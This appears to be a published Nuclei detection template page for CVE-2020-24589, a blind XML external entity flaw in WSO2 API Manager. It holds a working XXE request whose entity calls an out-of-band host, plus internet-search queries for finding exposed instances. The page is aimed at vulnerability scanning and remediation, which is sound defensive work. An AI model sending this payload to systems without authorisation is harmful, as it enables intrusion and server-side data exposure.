Skip to content
Nuclei Templates

WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection

ID: CVE-2020-24589

Severity: critical

Author: lethargynavigator

Tags: cve2020,cve,wso2,xxe,oast,blind

Description

Section titled “Description”

WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.

YAML Source

Section titled “YAML Source”
id: CVE-2020-24589


info:
  name: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
  author: lethargynavigator
  severity: critical
  description: WSO2 API Manager 3.1.0 and earlier is vulnerable to blind XML external entity injection (XXE). XXE often allows an attacker to view files on the server file system, and to interact with any backend or external systems that the application itself can access which allows the attacker to transmit sensitive data from the compromised server to a system that the attacker controls.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, denial of service, or server-side request forgery.
  remediation: |
    Upgrade to a patched version of WSO2 API Manager (3.1.1 or above) or apply the provided security patch.
  reference:
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0742
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24589
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/athiththan11/WSO2-CVE-Extractor
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2020-24589
    cwe-id: CWE-611
    epss-score: 0.64778
    epss-percentile: 0.97891
    cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wso2
    product: api_manager
    shodan-query: http.favicon.hash:1398055326
    fofa-query: icon_hash=1398055326
    google-query: inurl:"carbon/admin/login"
  tags: cve2020,cve,wso2,xxe,oast,blind


http:
  - raw:
      - |
        POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{{interactsh-url}}">%25xxe%3b]>


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"


      - type: word
        part: body
        words:
          - "Failed to install the generic artifact type"
# digest: 4a0a00473045022100cfb3695d96b98f29d8d47781e75d8de6656dce3b0ee47698a3b1109f645e228502203dd3ccef878160000fcc4cc7e0755eb135bb17ccd4fb2ea05aa8d60aa0e39682:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-24589.yaml"

View on Github